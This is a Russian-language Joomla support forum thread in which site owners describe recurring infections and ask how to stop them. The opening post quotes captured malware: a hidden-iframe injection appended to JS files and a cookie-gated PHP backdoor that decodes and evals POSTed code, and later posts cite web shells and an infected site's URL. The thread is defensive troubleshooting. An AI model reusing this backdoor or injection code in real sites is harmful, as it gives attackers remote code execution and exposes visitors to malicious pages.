Форум русской поддержки Joomla!® CMS
08.12.2016, 15:53:14 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1]   Вниз
  Добавить закладку  |  Печать  
Автор

Безопасность Joomla (Взломы - причины и следствия)

 (Прочитано 2695 раз)
0 Пользователей и 1 Гость смотрят эту тему.
Craze
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 78


« : 06.03.2013, 13:29:02 »

Долго я держал себя в руках, но все же открою топик на эту тему, тк последнее время начинает конкретно надоедать все это.
У меня несколько десятков сайтов, все на разные таматики, версия Joomla 1.5 и 2.5
За последние два месяца частота заражения сайтов начинает напрягать.
Что есть.
К примеру:
Хостинг.
Пароль на FTP в 18 значений, в перемешку буквы и символы
ОС Mac os - сразу исключаю взлом через FTP (может я не прав - поясните)

Сайт Joomla 2.5.9
Стоит:
Akeeba (акиба не самой последней версии, тк PHP 5.2.17)
Zoo
JCE
Jcomments
RSFirewall
sh404SEF
AcyMailing
Widgetkit

на некоторых стоит VirtueMart

Это список основоного, так сказать.

Что обычно происходит.

Вариант 1:
Идет замена .htaccess файла (вписывается код в центр его ил ив конец.) Если права поставить 444, то файл переименовывается, а рядом кладется другой с кодом.

Вариант два 2:
Во всех JS файлах добавляется внизу строчка вида (бывают разные):
Код:
;document.write('<iframe src="http://dphttz.rebatesrule.net/64e79f785494a6a4c59cc.SBC8o29lvoUtUsbg?default" name="Sandal" height="105" width="105" style="left:-500px;top:0px;position:fixed;"></iframe>');

Вариант 3:
В огромном количестве. практически в каждой паке добавляется файл вида:
b18gr.php
с кодом: <?php echo "#!!#";
Зачем это делается - не пойму. Но некоторые компоненты перестают работать в админке. К примеру Акиба и ZOO
Поясните?

Вариант 4:

Этот вариант работает с вариантом 3 обычно. В некоторых папках создается второй файлик php с рандомным именем, но в нем уже код вида:

Код:
<?php
if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
  echo '<textarea id=areatext>';
  eval($msg);
  echo '</textarea>bg';
  exit;
}}
?>

Иногда на версиях 1.5 можно найти залитый шелл в tmp папку или images, но сейчас вижу это редко.

Вопросы - как вы боритесь с этим? Меня интересует именно предотвращение заражения, а не как вычистить это все. Как чистить и так понятно, а вот как уберечься - не понимаю уже, тк обновления до последних версий не помогают.
Где искать дырку?
Знаю причины в том же JCE были, но сейчас на последних версиях вроде нет.
Была проблема с темой Bluestock для админки, но сейчас это тоже не актуально, вроде как.
Что делать? что делаете вы, как с этим жить? Azn
Записан
draff
Практически профи
*******

Репутация: +161/-5
Offline Offline

Пол: Мужской
Сообщений: 2657


step by step


« Ответ #1 : 06.03.2013, 17:57:48 »

Админ один ?
Записан
Craze
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 78


« Ответ #2 : 06.03.2013, 18:08:35 »

у части сайтов да. между собой не связаны.
Записан
ELLE
Support Team
*****

Репутация: +862/-0
Offline Offline

Пол: Женский
Сообщений: 4723



« Ответ #3 : 06.03.2013, 18:12:01 »

расширения используете не из официальных источников? (шаблоны, модули, плагины, компоненты)
Записан
Pazys
Практически профи
*******

Репутация: +241/-4
Offline Offline

Пол: Мужской
Сообщений: 1937


<a>А где я ошибся-то?</b>


« Ответ #4 : 06.03.2013, 18:37:56 »

Сайт Joomla 2.5.9
Стоит:
1. Akeeba (акиба не самой последней версии, тк PHP 5.2.17)
2. Zoo
3. JCE
4. Jcomments
5. RSFirewall
6. sh404SEF
7. AcyMailing
8. Widgetkit

ТОчно не скажу, но:
6. 1 год - 39 убитых евнухов
8. Full версия как минимум 29 евреев

Если не платили, то вспоминайте про "Бесплатный сыр бывает только в мышеловке"
И если остальное скачивали не с официальных сайтов - то тоже-самое.

Так что дыры могут быть там.

А хостинг - у меня был один раз лом хостинга ... и пароль тоже не детский .... в духе "6dgam*lT0dK%B6uhR2"
Записан
ELLE
Support Team
*****

Репутация: +862/-0
Offline Offline

Пол: Женский
Сообщений: 4723



« Ответ #5 : 06.03.2013, 18:54:29 »

ТОчно не скажу, но:
6. 1 год - 39 убитых евнухов
скажу точно - 3 года - 0 убитых :-) но стоит абсолютно нормальный, правда жутко устаревший Azn
последний раз залили каку с год назад по учетке верстальщика и то только в папку /templates/шаблон/*, так как доступ был только в эту папку Azn
Записан
komert
Осваиваюсь на форуме
***

Репутация: +1/-0
Offline Offline

Сообщений: 125


« Ответ #6 : 07.03.2013, 00:35:06 »

Подскажите реально помогающие БЕСПЛАТНЫЕ  расширения для защиты сайта ?
Записан
ELLE
Support Team
*****

Репутация: +862/-0
Offline Offline

Пол: Женский
Сообщений: 4723



« Ответ #7 : 07.03.2013, 00:50:37 »

Подскажите реально помогающие БЕСПЛАТНЫЕ  расширения для защиты сайта ?
по-моему ТС сам просит помощи, или вы его пост приняли за мануал?
Записан
draff
Практически профи
*******

Репутация: +161/-5
Offline Offline

Пол: Мужской
Сообщений: 2657


step by step


« Ответ #8 : 07.03.2013, 09:01:14 »

Подскажите реально помогающие БЕСПЛАТНЫЕ  расширения для защиты сайта ?
Хм, а как еще назвать тему, чтобы можно было всем понятно, где можно ознакомится с отзывами о расширениях для защиты?
http://joomlaforum.ru/index.php/topic,195980.0.html
Записан
master-smeta
Давно я тут
****

Репутация: +8/-0
Offline Offline

Пол: Мужской
Сообщений: 254


« Ответ #9 : 07.03.2013, 09:28:31 »

у меня сейчас такая же проблема. все сайты на Joomla 2.5.9 заражены этой же самой хренью. причем на одном сайте - вариант 2. а на другом и 3й и 4й тоже. не могу дыру найти. весь сайт скачал, вычистил, залил обратно на хост, через 5 минут опять эта гадость.
Что самое фиговое - код, упомянутый в пункте 2, периодически исчезает (правда после него остается ";" и в итоге в конце файлов видим: ;;;;;;;;;;;;Wink.
Сам впервые с этим сталкиваюсь. Помогите, если кто может!
P.S. из перечисленных плагинов и компонентов - нет ничего. у меня есть: GKTabs, JSCEditor и aiContactSafe.
Записан
draff
Практически профи
*******

Репутация: +161/-5
Offline Offline

Пол: Мужской
Сообщений: 2657


step by step


« Ответ #10 : 07.03.2013, 09:47:18 »

у меня сейчас такая же проблема. все сайты на Joomla 2.5.9 заражены этой же самой хренью. причем на одном сайте - вариант 2. а на другом и 3й и 4й тоже. не могу дыру найти.
Сам впервые с этим сталкиваюсь. Помогите, если кто может!
Как помочь ? Информация есть, расширения есть. Ссылка на платную помощь, в подписи
Записан
SmokerMan
Профи
********

Репутация: +694/-25
Offline Offline

Пол: Мужской
Сообщений: 5225



« Ответ #11 : 07.03.2013, 14:44:45 »

Недавно столкнулся с такой же проблемой)

Зачем это делается - не пойму. Но некоторые компоненты перестают работать в админке. К примеру Акиба и ZOO
Поясните?
Это делается видимо для того что бы прикрыть реальную дыру, которая описана в Вариант 4:. Но это мои предположения.

Адрес сайта можно увидеть? Есть предположения через что это делают.
Записан
master-smeta
Давно я тут
****

Репутация: +8/-0
Offline Offline

Пол: Мужской
Сообщений: 254


« Ответ #12 : 07.03.2013, 14:56:54 »

только что поудалял кучу файлов описанных в варианте 4. теперь ни сайт, ни админка не грузятся Sad

а вот если jHackGuard отключить, то все грузится
« Последнее редактирование: 07.03.2013, 15:06:11 от master-smeta » Записан
sail-winged
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 34



« Ответ #13 : 07.03.2013, 23:54:11 »

Сегодня разместил на хостинге шаблон. Админка работает хорошо, а вот сайт не открывается. При подключении коннектится к непонятному  хосту:  ... rebatesrule.net. Проверил другие сайты. Открываются, но все обращаются к этому же хосту. Проверил папки и БД - во всех JS файлах вариант 2. Подскажите для начала, как это вычистить?
« Последнее редактирование: 08.03.2013, 00:03:20 от sail-winged » Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 726


Свободен для работы


« Ответ #14 : 08.03.2013, 07:13:03 »

На счет того как обезопаситься! как минимум знаю несколько эксплоитов только глядя уже по названым компонентам! вследствие чего можно получить целевой доступ к сестеме!
1. сначало закройте потенциально уязвимые месте в компонентах!
2. выставите правильные права на файлы и папки.
3. запретите доступ на выполнение каких либо файлов в папке tmp/
4. поставте дополнительную авторизацию на админку (бейсик авторизацию!)
Записан
angel-w81
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 5


« Ответ #15 : 30.07.2015, 14:20:24 »

Добрый день.
На моем сайте тоже постоянно в папке сайт/tmp/plupload появляются файлы типа logo.php или sesat_1.php
Кто может что-то посоветовать.
Файлы постоянно удаляю но через время появляются.
Хостинг выдает сообщения что на сайте вирус.
Сайт http://www.corporationdp.net

Как то попробовал запустить один из файлов http://www.corporationdp.net/tmp/plupload/mil.php
там как бы форма для загрузки

как думаете еще, для временного решения если на заливаемые файлы установить права доступа 000 для исключения их исполнения? Поможет это?
 !
« Последнее редактирование: 30.07.2015, 14:25:53 от angel-w81 » Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 726


Свободен для работы


« Ответ #16 : 30.07.2015, 14:22:43 »

Добрый день.
На моем сайте тоже постоянно в папке сайт/tmp/plupload появляются файлы типа logo.php или sesat_1.php
Кто может что-то посоветовать.
Файлы постоянно удаляю но через время появляются.
Хостинг выдает сообщения что на сайте вирус.
Сайт http://www.corporationdp.net

Как то попробовал запустить один из файлов http://www.corporationdp.net/tmp/plupload/mil.php
там как бы форма для загрузки

как думаете еще, для временного решения если на заливаемые файлы установить права доступа 000 для исключения их исполнения? Поможет это?
 !
вот момент этот уже обсуждался http://joomlaforum.ru/index.php/topic,195980.msg1573058.html#msg1573058
Записан
angel-w81
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 5


« Ответ #17 : 30.07.2015, 14:30:19 »

При много благодарю. Нашел что искал. drink
Записан
cex263
Осваиваюсь на форуме
***

Репутация: +3/-0
Offline Offline

Пол: Мужской
Сообщений: 41



« Ответ #18 : 16.09.2015, 02:00:24 »

Больше чем уверен - виноват виртуальный хостинг.
Тоже была такая же ерунда, но когда перенёс сайты на VDS, такого больше ни разу не повторялось. Тьфу-тьфу-тьфу!
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 726


Свободен для работы


« Ответ #19 : 16.09.2015, 11:55:22 »

Больше чем уверен - виноват виртуальный хостинг.
Тоже была такая же ерунда, но когда перенёс сайты на VDS, такого больше ни разу не повторялось. Тьфу-тьфу-тьфу!
Да, частенько встречаются уязвимые хостинги, причем когда им сообщаешь, бьют себя в грудь и говорят что у них все пучком)))
P.S: Если не секрет у вас что за хостинг был?
Записан
cex263
Осваиваюсь на форуме
***

Репутация: +3/-0
Offline Offline

Пол: Мужской
Сообщений: 41



« Ответ #20 : 17.09.2015, 00:54:43 »

Джино
Записан
wishlight
Профи
********

Репутация: +200/-1
Offline Offline

Пол: Мужской
Сообщений: 3488


skype aqaus.com


« Ответ #21 : 17.09.2015, 08:25:40 »

Джино вообще просто сильно разрекламированный хостинг, не имеющий отношения к качеству. Как правило, ждать бесплатной или дешевой поддержки там не стоит.
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 726


Свободен для работы


« Ответ #22 : 17.09.2015, 09:54:32 »

конкретно, я находил багу в джино, которая до сих пор в приватах хранится... уж как полтора года...
Записан
wishlight
Профи
********

Репутация: +200/-1
Offline Offline

Пол: Мужской
Сообщений: 3488


skype aqaus.com


« Ответ #23 : 17.09.2015, 10:23:20 »

я находил багу в джино

всегда знал, что им не стоит верить.
Записан
Страниц: [1]   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet